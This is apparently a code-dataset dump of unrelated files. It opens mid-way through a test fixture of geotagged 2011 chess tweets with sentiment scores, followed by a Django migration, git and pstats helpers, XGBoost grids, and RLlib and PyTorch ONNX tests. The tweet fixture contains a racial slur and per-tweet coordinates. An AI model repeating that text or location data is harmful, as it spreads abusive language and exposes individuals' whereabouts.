['"@CarmenMaree: When u stop believing in me it doesn\'t discourage me it encourages me. Chess not checkers">no chess only checkers king me lol', datetime.datetime(2011, 9, 1, 7, 30, 26), 37.3508968, -121.9155979, ['carmenmaree', 'when', 'u', 'stop', 'believing', 'in', 'me', 'it', 'doesn', 't', 'discourage', 'me', 'it', 'encourages', 'me', 'chess', 'not', 'checkers', 'gt', 'no', 'chess', 'only', 'checkers', 'king', 'me', 'lol'], -0.4375],
['Cabdrivers playing chess on Lankershim http://t.co/VKmMBr1', datetime.datetime(2011, 9, 1, 10, 37, 35), 34.16588, -118.363726, ['cabdrivers', 'playing', 'chess', 'on', 'lankershim', 'http', 't', 'co', 'vkmmbr'], None],
['Chess really can make hisself sound like he from New Orleans.', datetime.datetime(2011, 9, 1, 16, 42, 16), 32.29965037, -90.21041482, ['chess', 'really', 'can', 'make', 'hisself', 'sound', 'like', 'he', 'from', 'new', 'orleans'], 0.4],
['Playing chess....sit back and watch', datetime.datetime(2011, 9, 1, 18, 10, 16), 29.99374808, -95.48194177, ['playing', 'chess', 'sit', 'back', 'and', 'watch'], 0.375],
['I feel like a pilgrim playing chess on my laptop.', datetime.datetime(2011, 8, 29, 1, 39, 45), 42.2434638, -71.8070041, ['i', 'feel', 'like', 'a', 'pilgrim', 'playing', 'chess', 'on', 'my', 'laptop'], -0.25],
['Playing chess with @teachu2swag91 #intelligenceiskey', datetime.datetime(2011, 9, 1, 20, 31, 17), 39.19055013, -96.58069392, ['playing', 'chess', 'with', 'teachu', 'swag', 'intelligenceiskey'], None],
["Kept pieces in great shape; never wanted to play them. RT @amhistorymuseum: Gen. McClellan's chess set: http://t.co/aNqMiN9 #CivilWar", datetime.datetime(2011, 9, 1, 22, 5, 7), 35.54968891, -79.19119128, ['kept', 'pieces', 'in', 'great', 'shape', 'never', 'wanted', 'to', 'play', 'them', 'rt', 'amhistorymuseum', 'gen', 'mcclellan', 's', 'chess', 'set', 'http', 't', 'co', 'anqmin', 'civilwar'], -0.03125],
['Good games of chess to have a que (@ Woodruff Park Chess Court) [pic]: http://t.co/1J38OHb', datetime.datetime(2011, 9, 1, 22, 30, 53), 33.75497282, -84.38881874, ['good', 'games', 'of', 'chess', 'to', 'have', 'a', 'que', 'woodruff', 'park', 'chess', 'court', 'pic', 'http', 't', 'co', 'j', 'ohb'], 0.4583333333333333],
['Love is like chess: one false move and your mated!', datetime.datetime(2011, 9, 2, 12, 18, 8), 39.67314645, -75.5933131, ['love', 'is', 'like', 'chess', 'one', 'false', 'move', 'and', 'your', 'mated'], -0.075],
['Life is like chess watch out for the thiefs...', datetime.datetime(2011, 8, 29, 2, 15, 9), 40.73606891, -73.8822584, ['life', 'is', 'like', 'chess', 'watch', 'out', 'for', 'the', 'thiefs'], -0.5],
["I've been really good busy with chess games...", datetime.datetime(2011, 8, 29, 2, 41, 54), 40.73605699, -73.88223831, ['i', 've', 'been', 'really', 'good', 'busy', 'with', 'chess', 'games'], 0.40625],
['I kind of miss playing chess!', datetime.datetime(2011, 8, 29, 3, 57, 29), 25.846725, -80.2089483, ['i', 'kind', 'of', 'miss', 'playing', 'chess'], 0.041666666666666664],
['This A Game Of Chess You Niggas Think Its Clevage Smh', datetime.datetime(2011, 8, 29, 5, 19, 44), 41.889577, -87.7166733, ['this', 'a', 'game', 'of', 'chess', 'you', 'niggas', 'think', 'its', 'clevage', 'smh'], -0.5],
['I got chess pains', datetime.datetime(2011, 8, 29, 7, 21, 52), 40.59106637, -73.95400384, ['i', 'got', 'chess', 'pains'], -0.25],
["@MickeyFactz yo what up with the All City Chess Club man? I need a mixtape from y'all BADLY!", datetime.datetime(2011, 9, 2, 15, 57, 43), 40.8890272, -73.86439015, ['mickeyfactz', 'yo', 'what', 'up', 'with', 'the', 'all', 'city', 'chess', 'club', 'man', 'i', 'need', 'a', 'mixtape', 'from', 'y', 'all', 'badly'], 0.125],
["checkmate RT @MarkusAMaximus: @AssHoleGabe I didn't know you were into chess.", datetime.datetime(2011, 9, 8, 17, 17, 59), 32.60908591, -114.70923197, ['checkmate', 'rt', 'markusamaximus', 'assholegabe', 'i', 'didn', 't', 'know', 'you', 'were', 'into', 'chess'], 0.2916666666666667],
['@booda0329 lol yeah he deserves to get his chess caved in 2day', datetime.datetime(2011, 9, 8, 18, 17, 21), 39.74443149, -75.52001935, ['booda', 'lol', 'yeah', 'he', 'deserves', 'to', 'get', 'his', 'chess', 'caved', 'in', 'day'], None],
["I'm at Panda Express (2011 Chess Dr., Bridgepointe Pkwy., San Mateo) http://t.co/ptyARBn", datetime.datetime(2011, 9, 8, 18, 38, 57), 37.562765, -122.280813, ['i', 'm', 'at', 'panda', 'express', 'chess', 'dr', 'bridgepointe', 'pkwy', 'san', 'mateo', 'http', 't', 'co', 'ptyarbn'], -0.375],
["@Eminem @ItsBadMeetsEvil Can't tell the difference.preference is on the challenge. Chess is a game of quiet minds.", datetime.datetime(2011, 9, 8, 19, 0, 19), 28.00071117, -82.54994606, ['eminem', 'itsbadmeetsevil', 'can', 't', 'tell', 'the', 'difference', 'preference', 'is', 'on', 'the', 'challenge', 'chess', 'is', 'a', 'game', 'of', 'quiet', 'minds'], -0.25],
['@XSTROLOGY: #Cancer women R the best players of romantic chess. She knw exactly hw to make a man desperately fall in love with her. THATS ME', datetime.datetime(2011, 9, 8, 21, 55, 11), 35.013108, -90.058008, ['xstrology', 'cancer', 'women', 'r', 'the', 'best', 'players', 'of', 'romantic', 'chess', 'she', 'knw', 'exactly', 'hw', 'to', 'make', 'a', 'man', 'desperately', 'fall', 'in', 'love', 'with', 'her', 'thats', 'me'], 0.53125],
['These n*ggas in here playing chess! Instead of cuttin hair \ue416', datetime.datetime(2011, 9, 8, 22, 16, 10), 33.21861974, -97.12732133, ['these', 'n', 'ggas', 'in', 'here', 'playing', 'chess', 'instead', 'of', 'cuttin', 'hair'], None],
['Мы с Катей Лагно:)) @ World Chess Hall of Fame http://t.co/EvL1cLA', datetime.datetime(2011, 9, 9, 0, 21, 29), 38.644756, -90.261281, ['world', 'chess', 'hall', 'of', 'fame', 'http', 't', 'co', 'evl', 'cla'], -0.375],
['Только что открыли Музей Шахматной Славы:) (@ World Chess Hall of Fame w/ 4 others) [pic]: http://t.co/kLfMIga', datetime.datetime(2011, 9, 9, 0, 26, 25), 38.644756, -90.261281, ['world', 'chess', 'hall', 'of', 'fame', 'w', 'others', 'pic', 'http', 't', 'co', 'klfmiga'], -0.375],
['GGs skool has 50 iPads her words - "isn\'t skool amazing" the get to play #chessw/friends in the chess club! #MSA rocks!', datetime.datetime(2011, 9, 9, 0, 32, 21), 41.79600115, -87.60432008, ['ggs', 'skool', 'has', 'ipads', 'her', 'words', 'isn', 't', 'skool', 'amazing', 'the', 'get', 'to', 'play', 'chessw', 'friends', 'in', 'the', 'chess', 'club', 'msa', 'rocks'], 0.25],
["I'm at Checkmate Chess Supply (Cary) http://t.co/ZtjuExj", datetime.datetime(2011, 9, 9, 0, 38, 10), 42.228951, -88.246605, ['i', 'm', 'at', 'checkmate', 'chess', 'supply', 'cary', 'http', 't', 'co', 'ztjuexj'], 0.125],
['I wonder if this is the kind of chess @neiltyson plays...? #grail #nasatweetup @ Kennedy Space Center http://t.co/gMGJXgC', datetime.datetime(2011, 9, 9, 1, 14, 58), 28.34326, -80.61127, ['i', 'wonder', 'if', 'this', 'is', 'the', 'kind', 'of', 'chess', 'neiltyson', 'plays', 'grail', 'nasatweetup', 'kennedy', 'space', 'center', 'http', 't', 'co', 'gmgjxgc'], 0.375],
['"@babycuzimmanerd: Know when u get that bad feeling in your chest?...Hmmm..." "I gotta pain in my chess an its hard to breav" u all good??', datetime.datetime(2011, 9, 9, 1, 32, 22), 41.53072809, -87.64389299, ['babycuzimmanerd', 'know', 'when', 'u', 'get', 'that', 'bad', 'feeling', 'in', 'your', 'chest', 'hmmm', 'i', 'gotta', 'pain', 'in', 'my', 'chess', 'an', 'its', 'hard', 'to', 'breav', 'u', 'all', 'good'], -0.05357142857142857],
['I lived in ur chess game but u changed the rules everyday', datetime.datetime(2011, 9, 9, 4, 29, 38), 31.17176022, -84.73426302, ['i', 'lived', 'in', 'ur', 'chess', 'game', 'but', 'u', 'changed', 'the', 'rules', 'everyday'], -0.16666666666666666],
["I'm at Willie Dixon's Blues Heaven Foundation (Historic Site of Chess Records) (2120 S. Michigan Ave., Chicago) http://t.co/euDdzlL", datetime.datetime(2011, 9, 9, 5, 31, 12), 41.853589, -87.624231, ['i', 'm', 'at', 'willie', 'dixon', 's', 'blues', 'heaven', 'foundation', 'historic', 'site', 'of', 'chess', 'records', 's', 'michigan', 'ave', 'chicago', 'http', 't', 'co', 'euddzll'], -0.25],
['Chess pieces. @ J.V. Bailey House http://t.co/pHNGFOE', datetime.datetime(2011, 9, 2, 20, 26, 13), 44.97925186, -93.16854095, ['chess', 'pieces', 'j', 'v', 'bailey', 'house', 'http', 't', 'co', 'phngfoe'], None],
['Playin chess to clear the mind', datetime.datetime(2011, 9, 2, 20, 50, 41), 38.9970325, -77.0356301, ['playin', 'chess', 'to', 'clear', 'the', 'mind'], 0.0],
['@MrSteveMatchett keep us posted on your chess results.', datetime.datetime(2011, 9, 2, 21, 19, 23), 40.10979198, -76.28119058, ['mrstevematchett', 'keep', 'us', 'posted', 'on', 'your', 'chess', 'results'], None],
['#microstock sales nice and steady on @Dreamstime chess players unite for this one! Haha http://t.co/gMzRKjW', datetime.datetime(2011, 9, 2, 21, 44, 12), 33.875078, -118.126954, ['microstock', 'sales', 'nice', 'and', 'steady', 'on', 'dreamstime', 'chess', 'players', 'unite', 'for', 'this', 'one', 'haha', 'http', 't', 'co', 'gmzrkjw'], 0.041666666666666664],
['@ZachAllStar chilli chess fries lol', datetime.datetime(2011, 9, 3, 0, 7, 41), 29.6627393, -95.47601923, ['zachallstar', 'chilli', 'chess', 'fries', 'lol'], None],
['Tryna make moves like a game of chess.', datetime.datetime(2011, 9, 3, 2, 55, 21), 40.01188117, -75.18427591, ['tryna', 'make', 'moves', 'like', 'a', 'game', 'of', 'chess'], -0.08333333333333333],
["Man life is life girl don't play me like chess peices", datetime.datetime(2011, 9, 3, 4, 0, 44), 32.85489302, -96.66359502, ['man', 'life', 'is', 'life', 'girl', 'don', 't', 'play', 'me', 'like', 'chess', 'peices'], -0.25],
["1234 5678", datetime.datetime(2011, 9, 3, 4, 0, 45), 33.85489302, -93.66359502, [], None],
["cheapjack", datetime.datetime(2011, 9, 3, 4, 0, 46), 33.85489302, -94.66359502, ['cheapjack'], -1.0],
["excellent", datetime.datetime(2011, 9, 3, 4, 0, 47), 33.85489302, -95.66359502, ['excellent'], 1.0],
["excellent cheapjack", datetime.datetime(2011, 9, 3, 4, 0, 48), 33.85489302, -96.66359502, ['excellent', 'cheapjack'], 0.0],
]
# Sentiment lexicon loaded from the data module (presumably word -> score;
# confirm against load_sentiments()). Used by the tweetsent cases below.
word_sentiments = load_sentiments()
# Each case: (class name, constructor args, test spec, expected result),
# one fixture list per Tweet accessor under test.
tweettext = [('Tweet',args[:4],{'_outputtest':'get_text'},args[0]) for args in tweetlist]
tweettime = [('Tweet',args[:4],{'_outputtest':'get_time'},args[1]) for args in tweetlist]
tweetloc = [('Tweet',args[:4],{'_outputtest':'get_location'},Position(*args[2:4])) for args in tweetlist]
tweetwords = [('Tweet',args[:4],{'_outputtest':'get_words'},args[4]) for args in tweetlist]
# get_sentiment with an empty lexicon is expected to yield None for every tweet.
tweetesent = [('Tweet',args[:4],{'_outputtest':'get_sentiment','_outputargs':[{}]},None) for args in tweetlist]
tweetsent = [('Tweet',args[:4],{'_outputtest':'get_sentiment','_outputargs':[word_sentiments]},args[5]) for args in tweetlist]
# zip(*[iterator]*4) groups consecutive items of the chained fixture stream
# four at a time into combined multi-assertion cases.
tweetmult = [(args1[0], (args1[1],args2[1],args3[1],args4[1]), args1[2], [args1[3],args2[3],args3[3],args4[3]]) for args1,args2,args3,args4 in zip(*[it.chain(tweettext,tweettime,tweetloc,tweetwords,tweetesent)]*4)]
def makedict(l):
    """Return a dict mapping each plain name in *l* to the object it names.

    Resolves names explicitly in this module's global namespace, falling
    back to builtins -- the same result the previous ``eval()``-based
    lookup produced for valid identifiers, but without evaluating
    arbitrary expressions.
    """
    import builtins
    module_ns = globals()
    result = {}
    for name in l:
        if name in module_ns:
            result[name] = module_ns[name]
        else:
            # Mirror Python's name resolution order: globals, then builtins.
            result[name] = getattr(builtins, name)
    return result
# Single-accessor test suites, keyed by fixture name.
tset = makedict(["tweettext","tweettime","tweetloc","tweetwords","tweetsent","tweetesent",
])
# Combined multi-assertion test suites.
jset = makedict(["tweetmult"
])
| [
"noreply@github.com"
] | borgr.noreply@github.com |
5aac4802175c9e01e52b360b66fd915af1002463 | e17680647cbaee4d2661246eac1357d7f1de1536 | /apps/organization/migrations/0004_auto_20180519_1313.py | bd9fef39819fa3e7e26363ba7b8ccf81ebee32c0 | [] | no_license | chenjb04/LearnOnline | 0cad4da6917121e889ce03928acd06f0e72313fc | 35dadcc73e3a803ca7756a51bbcc3e408912ab12 | refs/heads/master | 2020-04-26T17:21:43.360876 | 2019-05-06T08:18:43 | 2019-05-06T08:18:43 | 173,710,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | # Generated by Django 2.0.5 on 2018-05-19 13:13
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: renames CourseOrg.catgory to
    # 'category', fixing the field-name typo introduced by
    # 0003_courseorg_catgory.
    dependencies = [
        ('organization', '0003_courseorg_catgory'),
    ]
    operations = [
        migrations.RenameField(
            model_name='courseorg',
            old_name='catgory',
            new_name='category',
        ),
    ]
| [
"chenjb04@163.com"
] | chenjb04@163.com |
21d3203a342aae2ceed8f3725d137594722bd3ba | 41efe260c251c719f87e883cc97f3c796569c5ce | /deving/pstats_merge.py | 16347e4301e36cb3b64c3fd8be4318a421ce91cc | [] | no_license | orenovadia/deving | f49c4bb7a354d420644afc87c87c163f95ad4987 | 6b18347e43a556599593ec5f09248945966167de | refs/heads/master | 2020-03-10T07:10:47.326670 | 2019-02-10T23:21:18 | 2019-02-10T23:21:18 | 129,256,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | from __future__ import print_function
import pstats
import click
@click.command(name='pstats_merge')
@click.argument(
    'from_files',
    type=click.Path(exists=True, file_okay=True, dir_okay=False, resolve_path=False),
    required=True,
    nargs=-1
)
@click.argument(
    'to_file',
    type=click.Path(exists=False, file_okay=True, dir_okay=False, resolve_path=False),
    required=True
)
def pstats_merge(from_files, to_file):
    """
    Merges multiple pstat files to one
    Using: https://docs.python.org/2/library/profile.html
    """
    # pstats.Stats accepts several dump files at once and aggregates
    # their statistics on load; dump the combined result to TO_FILE.
    merged_stats = pstats.Stats(*from_files)
    merged_stats.dump_stats(to_file)
if __name__ == '__main__':
    # Invoke the click command when run directly as a script.
    pstats_merge()
| [
"orenovad@gmail.com"
] | orenovad@gmail.com |
bfc3d935394fc6ca878f5a81da542c5dea036d5d | 82d6e248d6498f53455f9ccb40b6ff9667da8f2e | /Params/xgb_cv_params.py | 46a7ba704b2ce3ce71ca634f5f5c6062b486bd36 | [] | no_license | marvinxu-free/data_analysis | 650ddf35443e66c395c8c503cacc328e547298a5 | 7a552959fd6272a54488c59091fa8b820c3f19ce | refs/heads/master | 2020-03-22T04:00:09.938423 | 2018-07-02T16:32:20 | 2018-07-02T16:32:20 | 139,466,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,577 | py | # -*- coding: utf-8 -*-
# Project: local-spark
# Author: chaoxu create this file
# Time: 2017/10/13
# Company : Maxent
# Email: chao.xu@maxent-inc.com
from __future__ import print_function, division
# Fixed parameters shared by the XGBoost binary classifiers.
xgb_base_params = {
    'objective': 'binary:logistic',
    # 'objective' : 'binary:logitraw',
    'nthread': -1,
    # 'scale_pos_weight':scale_ios_ratio,
    # 'missing':-6.666,
    'seed': 42
}
# Coarse hyper-parameter search space (presumably consumed by a grid /
# cross-validation search -- confirm against the caller).
xgb_test_params = {
    'learning_rate': [0.05, 0.1, 0.5],
    'n_estimators': range(10, 200, 10),
    'max_depth': range(3, 10, 2),
    'min_child_weight': range(1, 6, 2),
    'gamma': [i / 10.0 for i in range(0, 5)],
    'subsample': [i / 10.0 for i in range(6, 10)],
    'colsample_bytree': [i / 10.0 for i in range(6, 10)],
    'reg_alpha': [0, 0.001, 0.005, 0.01, 0.05],
}
# Finer search space, apparently tuned for the "qiaoda" dataset.
xgb_qiaoda_params = {
    'learning_rate': [i / 10.0 for i in range(1, 10)],
    'n_estimators': range(1, 20, 1),
    'max_depth': range(3, 10, 1),
    'min_child_weight': range(1, 10, 1),
    'gamma': [i / 10.0 for i in range(1, 10)],
    'subsample': [i / 10.0 for i in range(1, 10)],
    'colsample_bytree': [i / 10.0 for i in range(1, 10)],
    'reg_alpha': [i / 10.0 for i in range(1, 10)],
}
# Search space for the "jd" dataset: shallower trees, narrower ranges.
xgb_jd_params = {
    'learning_rate': [i / 10.0 for i in range(1, 10)],
    'n_estimators': range(1, 20, 1),
    'max_depth': range(1, 6, 1),
    'min_child_weight': range(1, 10, 1),
    'gamma': [i / 10.0 for i in range(1, 5)],
    'subsample': [i / 10.0 for i in range(1, 5)],
    'colsample_bytree': [i / 10.0 for i in range(1, 5)],
    'reg_alpha': [i / 10.0 for i in range(1, 5)],
}
| [
"marvinxu_free@163.com"
] | marvinxu_free@163.com |
d0023e8273cd6e97b2ad2bfdf9a6782d33bfc3e3 | bb109bd629c67a30a57850ebc97f9a9625aa998f | /wmtexe/cmi/git.py | 748d4b4a734ecdbb8b4082128123fa2889aa607b | [
"MIT"
] | permissive | csdms/wmt-exe | b0966f27792be853e8469f12a7e78aea24da6bfa | 9f6e5a20e65765389682161b985cab186db88fce | refs/heads/master | 2022-11-15T06:27:23.589160 | 2022-10-25T23:57:21 | 2022-10-25T23:57:21 | 22,662,428 | 0 | 2 | MIT | 2022-10-25T23:57:22 | 2014-08-05T23:04:09 | Python | UTF-8 | Python | false | false | 1,616 | py | #! /usr/bin/env python
import os
from .utils import which, check_output, system, cd, status
def git_repo_name(url):
    """Return the repository name for *url*: its basename minus extension."""
    basename = os.path.basename(url)
    return os.path.splitext(basename)[0]
def git_repo_sha(url, git=None, branch='master'):
    """Return the first 10 hex digits of the sha for *branch* at *url*.

    Runs ``git ls-remote`` and picks the entry for ``refs/heads/<branch>``.
    """
    git = git or which('git')
    listing = check_output([git, 'ls-remote', url]).strip()
    ref_to_sha = {}
    for entry in listing.split(os.linesep):
        sha, ref = entry.split()
        ref_to_sha[ref] = sha
    return ref_to_sha['refs/heads/{branch}'.format(branch=branch)][:10]
def git_clone(url, git=None, dir='.', branch='master'):
    """Create a fresh, shallow clone of *branch* from *url* inside *dir*."""
    git = git or which('git')
    fetch_refspec = '{branch}:refs/remotes/origin/{branch}'.format(branch=branch)
    # Same command sequence as `git clone --depth=1`, but done by hand so
    # it works in an already-existing (possibly non-empty) directory.
    commands = (
        [git, 'init', '-q'],
        [git, 'config', 'remote.origin.url', url],
        [git, 'config', 'remote.origin.fetch',
         '+refs/heads/*:refs/remotes/origin/*'],
        [git, 'fetch', 'origin', fetch_refspec, '-n', '--depth=1'],
        [git, 'reset', '--hard', 'origin/{branch}'.format(branch=branch)],
    )
    with cd(dir):
        for command in commands:
            system(command)
def git_pull(url, dir='.', branch='master'):
    """Update the existing clone in *dir* by pulling *branch* from origin.

    Note: *url* is not referenced here; the clone's configured origin is
    what gets pulled.
    """
    refspec = 'refs/heads/{branch}:refs/remotes/origin/{branch}'.format(branch=branch)
    with cd(dir):
        for command in (['git', 'checkout', '-q', branch],
                        ['git', 'pull', 'origin', '-q', refspec]):
            system(command)
def git_clone_or_update(url, dir='.', branch='master'):
    """Clone *url* into *dir*, or pull if a clone already exists there."""
    already_cloned = os.path.isdir(os.path.join(dir, '.git'))
    if not already_cloned:
        status('Cloning %s' % url)
        git_clone(url, dir=dir, branch=branch)
    else:
        status('Updating %s' % url)
        git_pull(url, dir=dir, branch=branch)
| [
"mcflugen@gmail.com"
] | mcflugen@gmail.com |
8f5359219eca321f19a6e87ffc21568d1cd514cd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02422/s434334605.py | 0f8d8509dfbc38c56d306e2d546cad7fb3863b38 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | S = input()
# Number of queries to run against the string S (read on the line above).
n = int(input())
for i in range(n):
    # q = [command, a, b, (replacement)]; a..b are inclusive 0-based indices.
    q = input().split()
    q[1] = int(q[1])
    q[2] = int(q[2])
    if q[0] == "print":
        # Print the substring S[a..b] (slice end is exclusive, hence +1).
        print(S[q[1]:q[2] + 1])
    elif q[0] == "reverse":
        if q[1] == 0:
            # Special case a == 0: S[b:a-1:-1] would be S[b:-1:-1] (empty),
            # so slice from b all the way down instead.
            S = S[:q[1]] + S[q[2]::-1] + S[q[2] + 1:]
        else:
            S = S[:q[1]] + S[q[2]:q[1] - 1:-1] + S[q[2] + 1:]
elif q[0] == "replace":
S = S[:q[1]] + q[3] + S[q[2] + 1:] | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fdd3bcccc3ab81cc1c4dd4ecddb857fc92b52c6c | 8f24e443e42315a81028b648e753c50967c51c78 | /rllib/algorithms/td3/tests/test_td3.py | 977c91fea4939895fe9cb6997559ab256cd0dcd1 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | simon-mo/ray | d07efdada8d05c6e10417f96e8dfc35f9ad33397 | 1e42e6cd15e2fb96c217cba8484e59ed0ef4b0c8 | refs/heads/master | 2023-03-06T00:09:35.758834 | 2022-12-23T18:46:48 | 2022-12-23T18:46:48 | 122,156,396 | 4 | 2 | Apache-2.0 | 2023-03-04T08:56:56 | 2018-02-20T04:47:06 | Python | UTF-8 | Python | false | false | 4,032 | py | import numpy as np
import unittest
import ray
import ray.rllib.algorithms.td3 as td3
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.test_utils import (
check,
check_compute_single_action,
check_train_results,
framework_iterator,
)
tf1, tf, tfv = try_import_tf()
class TestTD3(unittest.TestCase):
    # One shared Ray runtime for every test in this class.
    @classmethod
    def setUpClass(cls) -> None:
        ray.init()
    @classmethod
    def tearDownClass(cls) -> None:
        ray.shutdown()
    def test_td3_compilation(self):
        """Test whether TD3 can be built with both frameworks."""
        config = td3.TD3Config()
        # Test against all frameworks.
        for _ in framework_iterator(config, with_eager_tracing=True):
            algo = config.build(env="Pendulum-v1")
            num_iterations = 1
            for i in range(num_iterations):
                results = algo.train()
                # Validate the structure/contents of the train() results.
                check_train_results(results)
                print(results)
            # Also exercise single-action inference on the built algorithm.
            check_compute_single_action(algo)
            algo.stop()
    def test_td3_exploration_and_with_random_prerun(self):
        """Tests TD3's Exploration (w/ random actions for n timesteps)."""
        config = td3.TD3Config().environment(env="Pendulum-v1")
        # Copy of the default exploration settings (no random pre-run phase).
        no_random_init = config.exploration_config.copy()
        random_init = {
            # Act randomly at beginning ...
            "random_timesteps": 30,
            # Then act very closely to deterministic actions thereafter.
            "stddev": 0.001,
            "initial_scale": 0.001,
            "final_scale": 0.001,
        }
        # Fixed dummy observation used for every action query below.
        obs = np.array([0.0, 0.1, -0.1])
        # Test against all frameworks.
        for _ in framework_iterator(config, with_eager_tracing=True):
            config.exploration(exploration_config=no_random_init)
            # Default GaussianNoise setup.
            algo = config.build()
            # Setting explore=False should always return the same action.
            a_ = algo.compute_single_action(obs, explore=False)
            check(algo.get_policy().global_timestep, 1)
            for i in range(50):
                a = algo.compute_single_action(obs, explore=False)
                check(algo.get_policy().global_timestep, i + 2)
                check(a, a_)
            # explore=None (default: explore) should return different actions.
            actions = []
            for i in range(50):
                actions.append(algo.compute_single_action(obs))
                check(algo.get_policy().global_timestep, i + 52)
            check(np.std(actions), 0.0, false=True)
            algo.stop()
            # Check randomness at beginning.
            config.exploration(exploration_config=random_init)
            algo = config.build()
            # ts=0 (get a deterministic action as per explore=False).
            deterministic_action = algo.compute_single_action(obs, explore=False)
            check(algo.get_policy().global_timestep, 1)
            # ts=1-29 (in random window).
            random_a = []
            for i in range(1, 30):
                random_a.append(algo.compute_single_action(obs, explore=True))
                check(algo.get_policy().global_timestep, i + 1)
                # Each random action should differ from the deterministic one.
                check(random_a[-1], deterministic_action, false=True)
            self.assertTrue(np.std(random_a) > 0.3)
            # ts > 30 (a=deterministic_action + scale * N[0,1])
            for i in range(50):
                a = algo.compute_single_action(obs, explore=True)
                check(algo.get_policy().global_timestep, i + 31)
                check(a, deterministic_action, rtol=0.1)
            # ts >> 30 (BUT: explore=False -> expect deterministic action).
            for i in range(50):
                a = algo.compute_single_action(obs, explore=False)
                check(algo.get_policy().global_timestep, i + 81)
                check(a, deterministic_action)
            algo.stop()
if __name__ == "__main__":
    import pytest
    import sys
    # Run this file's tests verbosely through pytest.
    sys.exit(pytest.main(["-v", __file__]))
| [
"noreply@github.com"
] | simon-mo.noreply@github.com |
b8d5ded851da55920148133d10f0002e5942859e | 67db5c946b11bcc3cb6cef074ab6b6b9d0a72961 | /test/onnx/test_utility_funs.py | 0c1d8d3b2208639c42d531c4bdae58356f2065b2 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | dusty-nv/pytorch | 951c570c8c52ffb839275dfe5956a814ff556e5e | d0c925f1c73d6015122e71c8c59cbf1af3f06250 | refs/heads/master | 2022-05-26T15:18:39.557017 | 2020-04-16T16:01:05 | 2020-04-16T16:03:17 | 256,265,482 | 2 | 0 | NOASSERTION | 2020-04-16T16:09:26 | 2020-04-16T16:09:26 | null | UTF-8 | Python | false | false | 26,624 | py | from __future__ import absolute_import, division, print_function, unicode_literals
from test_pytorch_common import TestCase, run_tests
import torch
import torch.onnx
from torch.onnx import utils, OperatorExportTypes
from torch.onnx.symbolic_helper import _set_opset_version, _set_operator_export_type
from test_pytorch_common import skipIfUnsupportedOpsetVersion
import onnx
import onnxruntime # noqa
import numpy as np
import io
import copy
import unittest
skip = unittest.skip
class TestUtilityFuns(TestCase):
    # Default ONNX opset version targeted by the export helpers in these tests.
    opset_version = 9
def setUp(self):
torch.manual_seed(0)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(0)
def test_is_in_onnx_export(self):
test_self = self
class MyModule(torch.nn.Module):
def forward(self, x):
test_self.assertTrue(torch.onnx.is_in_onnx_export())
raise ValueError
return x + 1
x = torch.randn(3, 4)
f = io.BytesIO()
try:
torch.onnx.export(MyModule(), x, f, opset_version=self.opset_version)
except ValueError:
self.assertFalse(torch.onnx.is_in_onnx_export())
def test_validate_dynamic_axes_invalid_input_output_name(self):
import warnings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
utils._validate_dynamic_axes({'input1': {}, 'output': {},
'invalid_name1': {}, 'invalid_name2': {}},
None, ['input1', 'input2'], ['output'])
messages = [str(warning.message) for warning in w]
assert "Provided key invalid_name1 for dynamic axes is not a valid input/output name" in messages
assert "Provided key invalid_name2 for dynamic axes is not a valid input/output name" in messages
assert len(messages) == 2
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_transpose(self):
class TransposeModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.transpose(a, 1, 0)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(3, 2)
graph, _, __ = utils._model_to_graph(TransposeModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Transpose"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
def test_constant_fold_reduceL2(self):
class TransposeModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.norm(a, p=2, dim=-2, keepdim=False)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(2, 3)
graph, _, __ = utils._model_to_graph(TransposeModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::ReduceL2"
assert len(list(graph.nodes())) == 1
def test_constant_fold_reduceL1(self):
class NormModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.norm(a, p=1, dim=-2)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(2, 3)
graph, _, __ = utils._model_to_graph(NormModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::ReduceL1"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_slice(self):
class NarrowModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.narrow(a, 0, 0, 1)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
